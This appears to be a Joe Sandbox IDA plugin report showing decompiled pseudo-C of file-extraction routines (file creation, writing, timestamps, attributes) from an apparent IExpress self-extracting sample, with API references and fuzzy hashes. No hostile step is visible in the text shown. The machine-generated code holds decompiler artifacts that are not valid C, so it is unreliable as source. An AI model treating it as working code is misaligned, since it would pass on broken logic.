                                                                                                                                                                                                                                              						if(_t37 != 0) {
                                                                                                                                                                                                                                              							SetDlgItemTextA(_t37, 0x837,  *(_t75 + 4));
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						_t54 = 0x1a91e4;
                                                                                                                                                                                                                                              						_t58 = 0x1a91e4;
                                                                                                                                                                                                                                              						do {
                                                                                                                                                                                                                                              							_t38 =  *_t58;
                                                                                                                                                                                                                                              							_t58 =  &(_t58[1]);
                                                                                                                                                                                                                                              							__eflags = _t38;
                                                                                                                                                                                                                                              						} while (_t38 != 0);
                                                                                                                                                                                                                                              						_t59 = _t58 - 0x1a91e5;
                                                                                                                                                                                                                                              						__eflags = _t59;
                                                                                                                                                                                                                                              						_t71 =  *(_t75 + 4);
                                                                                                                                                                                                                                              						_t73 =  &(_t71[1]);
                                                                                                                                                                                                                                              						do {
                                                                                                                                                                                                                                              							_t39 =  *_t71;
                                                                                                                                                                                                                                              							_t71 =  &(_t71[1]);
                                                                                                                                                                                                                                              							__eflags = _t39;
                                                                                                                                                                                                                                              						} while (_t39 != 0);
                                                                                                                                                                                                                                              						_t69 = _t71 - _t73;
                                                                                                                                                                                                                                              						_t30 = _t59 + 1 + _t71 - _t73;
                                                                                                                                                                                                                                              						__eflags = _t30 - 0x104;
                                                                                                                                                                                                                                              						if(_t30 >= 0x104) {
                                                                                                                                                                                                                                              							L3:
                                                                                                                                                                                                                                              							_t33 = _t30 | 0xffffffff;
                                                                                                                                                                                                                                              							goto L35;
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						_t69 = 0x1a91e4;
                                                                                                                                                                                                                                              						_t30 = E001A4702( &_v268, 0x1a91e4,  *(_t75 + 4));
                                                                                                                                                                                                                                              						__eflags = _t30;
                                                                                                                                                                                                                                              						if(__eflags == 0) {
                                                                                                                                                                                                                                              							goto L3;
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						_t41 = E001A476D( &_v268, __eflags);
                                                                                                                                                                                                                                              						__eflags = _t41;
                                                                                                                                                                                                                                              						if(_t41 == 0) {
                                                                                                                                                                                                                                              							goto L9;
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						_push(0x180);
                                                                                                                                                                                                                                              						_t30 = E001A4980( &_v268, 0x8302); // executed
                                                                                                                                                                                                                                              						_t75 = _t30;
                                                                                                                                                                                                                                              						__eflags = _t75 - 0xffffffff;
                                                                                                                                                                                                                                              						if(_t75 == 0xffffffff) {
                                                                                                                                                                                                                                              							goto L3;
                                                                                                                                                                                                                                              						}
						_t30 = E001A47E0( &_v268);
						__eflags = _t30;
						if(_t30 == 0) {
							goto L3;
						}
						 *0x1a93f4 =  *0x1a93f4 + 1;
						_t33 = _t75;
						goto L35;
					}
					_t44 = _t36 - 1;
					__eflags = _t44;
					if(_t44 == 0) {
						_t54 = 0x1a91e4;
						_t63 = 0x1a91e4;
						do {
							_t45 =  *_t63;
							_t63 =  &(_t63[1]);
							__eflags = _t45;
						} while (_t45 != 0);
						_t74 =  *(_t75 + 4);
						_t64 = _t63 - 0x1a91e5;
						__eflags = _t64;
						_t69 =  &(_t74[1]);
						do {
							_t46 =  *_t74;
							_t74 =  &(_t74[1]);
							__eflags = _t46;
						} while (_t46 != 0);
						_t73 = _t74 - _t69;
						_t30 = _t64 + 1 + _t74 - _t69;
						__eflags = _t30 - 0x104;
						if(_t30 >= 0x104) {
							goto L3;
						}
						_t69 = 0x1a91e4;
						_t30 = E001A4702( &_v268, 0x1a91e4,  *(_t75 + 4));
						__eflags = _t30;
						if(_t30 == 0) {
							goto L3;
						}
						_t69 =  *((intOrPtr*)(_t75 + 0x18));
						_t30 = E001A4C37( *((intOrPtr*)(_t75 + 0x14)),  *((intOrPtr*)(_t75 + 0x18)),  *(_t75 + 0x1a) & 0x0000ffff); // executed
						__eflags = _t30;
						if(_t30 == 0) {
							goto L3;
						}
						E001A4B60( *((intOrPtr*)(_t75 + 0x14))); // executed
						_t50 =  *(_t75 + 0x1c) & 0x0000ffff;
						__eflags = _t50;
						if(_t50 != 0) {
							_t51 = _t50 & 0x00000027;
							__eflags = _t51;
						} else {
							_t51 = 0x80;
						}
						_t30 = SetFileAttributesA( &_v268, _t51); // executed
						__eflags = _t30;
						if(_t30 == 0) {
							goto L3;
						} else {
							_t33 = 1;
							goto L35;
						}
					}
					_t30 = _t44 - 1;
					__eflags = _t30;
					if(_t30 == 0) {
						goto L3;
					}
					goto L9;
				}
				if(_a4 == 3) {
					_t30 = E001A4B60( *((intOrPtr*)(_t75 + 0x14)));
				}
				goto L3;
			}































                                                                                                                                                                                                                                              0x001a4e5b
                                                                                                                                                                                                                                              0x001a4e5e
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a4e6a
                                                                                                                                                                                                                                              0x001a4e6f
                                                                                                                                                                                                                                              0x001a4e71
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a4e77
                                                                                                                                                                                                                                              0x001a4e7d
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a4e7d
                                                                                                                                                                                                                                              0x001a4d25
                                                                                                                                                                                                                                              0x001a4d25
                                                                                                                                                                                                                                              0x001a4d28
                                                                                                                                                                                                                                              0x001a4d36
                                                                                                                                                                                                                                              0x001a4d3b
                                                                                                                                                                                                                                              0x001a4d40
                                                                                                                                                                                                                                              0x001a4d40
                                                                                                                                                                                                                                              0x001a4d42
                                                                                                                                                                                                                                              0x001a4d43
                                                                                                                                                                                                                                              0x001a4d43
                                                                                                                                                                                                                                              0x001a4d47
                                                                                                                                                                                                                                              0x001a4d4a
                                                                                                                                                                                                                                              0x001a4d4a
                                                                                                                                                                                                                                              0x001a4d4c
                                                                                                                                                                                                                                              0x001a4d4f
                                                                                                                                                                                                                                              0x001a4d4f
                                                                                                                                                                                                                                              0x001a4d51
                                                                                                                                                                                                                                              0x001a4d52
                                                                                                                                                                                                                                              0x001a4d52
                                                                                                                                                                                                                                              0x001a4d56
                                                                                                                                                                                                                                              0x001a4d5b
                                                                                                                                                                                                                                              0x001a4d5d
                                                                                                                                                                                                                                              0x001a4d62
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a4d67
                                                                                                                                                                                                                                              0x001a4d6f
                                                                                                                                                                                                                                              0x001a4d74
                                                                                                                                                                                                                                              0x001a4d76
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a4d7c
                                                                                                                                                                                                                                              0x001a4d84
                                                                                                                                                                                                                                              0x001a4d89
                                                                                                                                                                                                                                              0x001a4d8b
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a4d94
                                                                                                                                                                                                                                              0x001a4d99
                                                                                                                                                                                                                                              0x001a4d9e
                                                                                                                                                                                                                                              0x001a4da1
                                                                                                                                                                                                                                              0x001a4daa
                                                                                                                                                                                                                                              0x001a4daa
                                                                                                                                                                                                                                              0x001a4da3
                                                                                                                                                                                                                                              0x001a4da3
                                                                                                                                                                                                                                              0x001a4da3
                                                                                                                                                                                                                                              0x001a4db5
                                                                                                                                                                                                                                              0x001a4dbb
                                                                                                                                                                                                                                              0x001a4dbd
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a4dc3
                                                                                                                                                                                                                                              0x001a4dc5
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a4dc5
                                                                                                                                                                                                                                              0x001a4dbd
                                                                                                                                                                                                                                              0x001a4d2a
                                                                                                                                                                                                                                              0x001a4d2a
                                                                                                                                                                                                                                              0x001a4d2d
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a4d2d
                                                                                                                                                                                                                                              0x001a4cf8
                                                                                                                                                                                                                                              0x001a4cfd
                                                                                                                                                                                                                                              0x001a4d02
                                                                                                                                                                                                                                              0x00000000

APIs
• SetFileAttributesA.KERNELBASE(?,?,?,?), ref: 001A4DB5
• SetDlgItemTextA.USER32(00000000,00000837,?), ref: 001A4DDD
Strings
Memory Dump Source
• Source File: 00000001.00000002.411425233.00000000001A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 001A0000, based on PE: true
• Associated: 00000001.00000002.411409282.00000000001A0000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.411438065.00000000001A8000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.411446863.00000000001AA000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.411446863.00000000001AC000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_1a0000_fuN31PL.jbxd
Similarity
• API ID: AttributesFileItemText
• String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\
• API String ID: 3625706803-3647970563
• Opcode ID: a85a926d71a86bd1cc2f003cafbbaf639000ac06be1e33613b2284b42d51f745
• Instruction ID: 7412cd547b79c0d06294263de803ebedd08ba6d670e93250ccb8747967cea701
• Opcode Fuzzy Hash: a85a926d71a86bd1cc2f003cafbbaf639000ac06be1e33613b2284b42d51f745
• Instruction Fuzzy Hash: 7541133E2001019BCB259FB8DD446F6B3A5FFE7360F044668E88697685DBB1DE8AC750
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%
E001A4C37(signed int __ecx, int __edx, int _a4) {
	struct _FILETIME _v12;
	struct _FILETIME _v20;
	FILETIME* _t14;
	int _t15;
	signed int _t21;

	_t21 = __ecx * 0x18;
	if( *((intOrPtr*)(_t21 + 0x1a8d64)) == 1 || DosDateTimeToFileTime(__edx, _a4,  &_v20) == 0 || LocalFileTimeToFileTime( &_v20,  &_v12) == 0) {
		L5:
		return 0;
	} else {
		_t14 =  &_v12;
		_t15 = SetFileTime( *(_t21 + 0x1a8d74), _t14, _t14, _t14); // executed
		if(_t15 == 0) {
			goto L5;
		}
		return 1;
	}
}









                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • DosDateTimeToFileTime.KERNEL32 ref: 001A4C54
                                                                                                                                                                                                                                              • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 001A4C66
                                                                                                                                                                                                                                              • SetFileTime.KERNELBASE(?,?,?,?), ref: 001A4C7E
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.411425233.00000000001A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411409282.00000000001A0000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411438065.00000000001A8000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411446863.00000000001AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411446863.00000000001AC000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_1a0000_fuN31PL.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Time$File$DateLocal
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 2071732420-0
                                                                                                                                                                                                                                              • Opcode ID: 40139892bc32ca8a9b17dc7004bc05a4f378c81fcaa4ef9ed5e7deacbdf6829d
                                                                                                                                                                                                                                              • Instruction ID: 0de9f86e2da47bef7592ba365b023c75c6eacc4201a0dbc23bf77d37175e8223
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 40139892bc32ca8a9b17dc7004bc05a4f378c81fcaa4ef9ed5e7deacbdf6829d
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 28F0907660120CBFAB25DFB4CC48EBB7BECEB46360B44052AA819C1054EB70D954C7A0
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              C-Code - Quality: 75%
                                                                                                                                                                                                                                              			E001A487A(CHAR* __ecx, signed int __edx) {
                                                                                                                                                                                                                                              				void* _t7;
                                                                                                                                                                                                                                              				CHAR* _t11;
                                                                                                                                                                                                                                              				long _t18;
                                                                                                                                                                                                                                              				long _t23;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				_t11 = __ecx;
                                                                                                                                                                                                                                              				asm("sbb edi, edi");
                                                                                                                                                                                                                                              				_t18 = ( ~(__edx & 3) & 0xc0000000) + 0x80000000;
                                                                                                                                                                                                                                              				if((__edx & 0x00000100) == 0) {
                                                                                                                                                                                                                                              					asm("sbb esi, esi");
                                                                                                                                                                                                                                              					_t23 = ( ~(__edx & 0x00000200) & 0x00000002) + 3;
                                                                                                                                                                                                                                              				} else {
                                                                                                                                                                                                                                              					if((__edx & 0x00000400) == 0) {
                                                                                                                                                                                                                                              						asm("sbb esi, esi");
                                                                                                                                                                                                                                              						_t23 = ( ~(__edx & 0x00000200) & 0xfffffffe) + 4;
                                                                                                                                                                                                                                              					} else {
                                                                                                                                                                                                                                              						_t23 = 1;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				_t7 = CreateFileA(_t11, _t18, 0, 0, _t23, 0x80, 0); // executed
                                                                                                                                                                                                                                              				if(_t7 != 0xffffffff || _t23 == 3) {
                                                                                                                                                                                                                                              					return _t7;
                                                                                                                                                                                                                                              				} else {
                                                                                                                                                                                                                                              					E001A490C(_t11);
                                                                                                                                                                                                                                              					return CreateFileA(_t11, _t18, 0, 0, _t23, 0x80, 0);
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              			}








                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • CreateFileA.KERNELBASE(00008000,-80000000,00000000,00000000,?,00000080,00000000,00000000,00000000,00000000,001A4A23,?,001A4F67,*MEMCAB,00008000,00000180), ref: 001A48DE
                                                                                                                                                                                                                                              • CreateFileA.KERNEL32(00008000,-80000000,00000000,00000000,?,00000080,00000000,?,001A4F67,*MEMCAB,00008000,00000180), ref: 001A4902
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.411425233.00000000001A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411409282.00000000001A0000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411438065.00000000001A8000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411446863.00000000001AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411446863.00000000001AC000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_1a0000_fuN31PL.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: CreateFile
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 823142352-0
                                                                                                                                                                                                                                              • Opcode ID: f896cd7f5ef600a6ec64b77853f1593b1fe364c024555e1231dc5e1a596c5800
                                                                                                                                                                                                                                              • Instruction ID: 2bb3cd0c92af12bb5d5e12593da431d0e3e1ca1268e99c9c657c88310dacbed2
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f896cd7f5ef600a6ec64b77853f1593b1fe364c024555e1231dc5e1a596c5800
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E40124ABE125702AF22440699C88BB7551CCBDB734F1B0234BDEAA66D2D6A84C0482E0
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              C-Code - Quality: 93%
                                                                                                                                                                                                                                              			E001A4AD0(signed int _a4, void* _a8, long _a12) {
                                                                                                                                                                                                                                              				signed int _t9;
                                                                                                                                                                                                                                              				int _t12;
                                                                                                                                                                                                                                              				signed int _t14;
                                                                                                                                                                                                                                              				signed int _t15;
                                                                                                                                                                                                                                              				void* _t20;
                                                                                                                                                                                                                                              				struct HWND__* _t21;
                                                                                                                                                                                                                                              				signed int _t24;
                                                                                                                                                                                                                                              				signed int _t25;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				_t20 =  *0x1a858c; // 0xc0
                                                                                                                                                                                                                                              				_t9 = E001A3680(_t20);
                                                                                                                                                                                                                                              				if( *0x1a91d8 == 0) {
                                                                                                                                                                                                                                              					_push(_t24);
                                                                                                                                                                                                                                              					_t12 = WriteFile( *(0x1a8d74 + _a4 * 0x18), _a8, _a12,  &_a12, 0); // executed
                                                                                                                                                                                                                                              					if(_t12 != 0) {
                                                                                                                                                                                                                                              						_t25 = _a12;
                                                                                                                                                                                                                                              						if(_t25 != 0xffffffff) {
                                                                                                                                                                                                                                              							_t14 =  *0x1a9400; // 0xa2800
                                                                                                                                                                                                                                              							_t15 = _t14 + _t25;
                                                                                                                                                                                                                                              							 *0x1a9400 = _t15;
                                                                                                                                                                                                                                              							if( *0x1a8184 != 0) {
                                                                                                                                                                                                                                              								_t21 =  *0x1a8584; // 0x0
                                                                                                                                                                                                                                              								if(_t21 != 0) {
                                                                                                                                                                                                                                              									SendDlgItemMessageA(_t21, 0x83a, 0x402, _t15 * 0x64 /  *0x1a93f8, 0);
                                                                                                                                                                                                                                              								}
                                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              					} else {
                                                                                                                                                                                                                                              						_t25 = _t24 | 0xffffffff;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					return _t25;
                                                                                                                                                                                                                                              				} else {
                                                                                                                                                                                                                                              					return _t9 | 0xffffffff;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              			}












                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                • Part of subcall function 001A3680: MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004FF), ref: 001A369F
                                                                                                                                                                                                                                                • Part of subcall function 001A3680: PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 001A36B2
                                                                                                                                                                                                                                                • Part of subcall function 001A3680: PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 001A36DA
                                                                                                                                                                                                                                              • WriteFile.KERNELBASE(?,?,?,?,00000000), ref: 001A4B05
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.411425233.00000000001A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411409282.00000000001A0000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411438065.00000000001A8000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411446863.00000000001AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411446863.00000000001AC000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_1a0000_fuN31PL.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: MessagePeek$FileMultipleObjectsWaitWrite
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 1084409-0
                                                                                                                                                                                                                                              • Opcode ID: 7b9a1f21e3af73f8f59e5cb1115f108936900961f7dace4801b53bc335ef4321
                                                                                                                                                                                                                                              • Instruction ID: 00e861371826e669633648ed5e9268b31d783c7f1fbb20601d3f2919531567aa
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7b9a1f21e3af73f8f59e5cb1115f108936900961f7dace4801b53bc335ef4321
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C501B135200201ABDB158F68DC05BA27B69FB8A735F148225F93A9B5F0CBB0DC91CB91
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                                                                                              			E001A658A(char* __ecx, void* __edx, char* _a4) {
                                                                                                                                                                                                                                              				intOrPtr _t4;
                                                                                                                                                                                                                                              				char* _t6;
                                                                                                                                                                                                                                              				char* _t8;
                                                                                                                                                                                                                                              				void* _t10;
                                                                                                                                                                                                                                              				void* _t12;
                                                                                                                                                                                                                                              				char* _t16;
                                                                                                                                                                                                                                              				intOrPtr* _t17;
                                                                                                                                                                                                                                              				void* _t18;
                                                                                                                                                                                                                                              				char* _t19;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				_t16 = __ecx;
                                                                                                                                                                                                                                              				_t10 = __edx;
                                                                                                                                                                                                                                              				_t17 = __ecx;
                                                                                                                                                                                                                                              				_t1 = _t17 + 1; // 0x1a8b3f
                                                                                                                                                                                                                                              				_t12 = _t1;
                                                                                                                                                                                                                                              				do {
                                                                                                                                                                                                                                              					_t4 =  *_t17;
                                                                                                                                                                                                                                              					_t17 = _t17 + 1;
                                                                                                                                                                                                                                              				} while (_t4 != 0);
                                                                                                                                                                                                                                              				_t18 = _t17 - _t12;
                                                                                                                                                                                                                                              				_t2 = _t18 + 1; // 0x1a8b40
                                                                                                                                                                                                                                              				if(_t2 < __edx) {
                                                                                                                                                                                                                                              					_t19 = _t18 + __ecx;
                                                                                                                                                                                                                                              					if(_t19 > __ecx) {
                                                                                                                                                                                                                                              						_t8 = CharPrevA(__ecx, _t19); // executed
                                                                                                                                                                                                                                              						if( *_t8 != 0x5c) {
                                                                                                                                                                                                                                              							 *_t19 = 0x5c;
                                                                                                                                                                                                                                              							_t19 =  &(_t19[1]);
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					_t6 = _a4;
                                                                                                                                                                                                                                              					 *_t19 = 0;
                                                                                                                                                                                                                                              					while( *_t6 == 0x20) {
                                                                                                                                                                                                                                              						_t6 = _t6 + 1;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					return E001A16B3(_t16, _t10, _t6);
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				return 0x8007007a;
                                                                                                                                                                                                                                              			}













                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • CharPrevA.USER32(001A8B3E,001A8B3F,00000001,001A8B3E,-00000003,?,001A60EC,001A1140,?), ref: 001A65BA
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.411425233.00000000001A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411409282.00000000001A0000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411438065.00000000001A8000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411446863.00000000001AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411446863.00000000001AC000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_1a0000_fuN31PL.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: CharPrev
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 122130370-0
                                                                                                                                                                                                                                              • Opcode ID: 7537072d1c9024048fb0949b8bf36b282461c6ef012709c294d62de3b9bcb20a
                                                                                                                                                                                                                                              • Instruction ID: b9347710cae52bf2073b0f564e0a128e2f45408886c368a61c562e1378bb3875
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7537072d1c9024048fb0949b8bf36b282461c6ef012709c294d62de3b9bcb20a
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6DF04276D042509FD335451D9884B76BFDDDB97390F1D015EE8DEC3209DB554C4683A4
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              C-Code - Quality: 93%
                                                                                                                                                                                                                                              			E001A621E() {
                                                                                                                                                                                                                                              				signed int _v8;
                                                                                                                                                                                                                                              				char _v268;
                                                                                                                                                                                                                                              				signed int _t5;
                                                                                                                                                                                                                                              				void* _t9;
                                                                                                                                                                                                                                              				void* _t13;
                                                                                                                                                                                                                                              				void* _t19;
                                                                                                                                                                                                                                              				void* _t20;
                                                                                                                                                                                                                                              				signed int _t21;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				_t5 =  *0x1a8004; // 0x56898003
                                                                                                                                                                                                                                              				_v8 = _t5 ^ _t21;
                                                                                                                                                                                                                                              				if(GetWindowsDirectoryA( &_v268, 0x104) != 0) {
                                                                                                                                                                                                                                              					0x4f0 = 2;
                                                                                                                                                                                                                                              					_t9 = E001A597D( &_v268, 0x4f0, _t19, 0x4f0); // executed
                                                                                                                                                                                                                                              				} else {
                                                                                                                                                                                                                                              					E001A44B9(0, 0x4f0, _t8, _t8, 0x10, _t8);
                                                                                                                                                                                                                                              					 *0x1a9124 = E001A6285();
                                                                                                                                                                                                                                              					_t9 = 0;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				return E001A6CE0(_t9, _t13, _v8 ^ _t21, 0x4f0, _t19, _t20);
                                                                                                                                                                                                                                              			}












                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 001A623F
                                                                                                                                                                                                                                                • Part of subcall function 001A44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 001A4518
                                                                                                                                                                                                                                                • Part of subcall function 001A44B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 001A4554
                                                                                                                                                                                                                                                • Part of subcall function 001A6285: GetLastError.KERNEL32(001A5BBC), ref: 001A6285
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.411425233.00000000001A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411409282.00000000001A0000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411438065.00000000001A8000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411446863.00000000001AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411446863.00000000001AC000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_1a0000_fuN31PL.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: DirectoryErrorLastLoadMessageStringWindows
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 381621628-0
                                                                                                                                                                                                                                              • Opcode ID: 8086d38c1c25ec11157e92ec96c7acc8303dee125c54b86517dc02f6802915e8
                                                                                                                                                                                                                                              • Instruction ID: 0b8aac681d47f45aac4fd57cea2201432c345edbeaeabff54e919ceca95d0507
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8086d38c1c25ec11157e92ec96c7acc8303dee125c54b86517dc02f6802915e8
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A8F0E2B4704208ABE750EF748D02FBE33BCDBA6300F40006AB98ADA081EF749D848690
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                                                                                              			E001A4B60(signed int _a4) {
                                                                                                                                                                                                                                              				signed int _t9;
                                                                                                                                                                                                                                              				signed int _t15;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				_t15 = _a4 * 0x18;
                                                                                                                                                                                                                                              				if( *((intOrPtr*)(_t15 + 0x1a8d64)) != 1) {
                                                                                                                                                                                                                                              					_t9 = FindCloseChangeNotification( *(_t15 + 0x1a8d74)); // executed
                                                                                                                                                                                                                                              					if(_t9 == 0) {
                                                                                                                                                                                                                                              						return _t9 | 0xffffffff;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					 *((intOrPtr*)(_t15 + 0x1a8d60)) = 1;
                                                                                                                                                                                                                                              					return 0;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				 *((intOrPtr*)(_t15 + 0x1a8d60)) = 1;
                                                                                                                                                                                                                                              				 *((intOrPtr*)(_t15 + 0x1a8d68)) = 0;
                                                                                                                                                                                                                                              				 *((intOrPtr*)(_t15 + 0x1a8d70)) = 0;
                                                                                                                                                                                                                                              				 *((intOrPtr*)(_t15 + 0x1a8d6c)) = 0;
                                                                                                                                                                                                                                              				return 0;
                                                                                                                                                                                                                                              			}






                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • FindCloseChangeNotification.KERNELBASE(?,00000000,00000000,?,001A4FA1,00000000), ref: 001A4B98
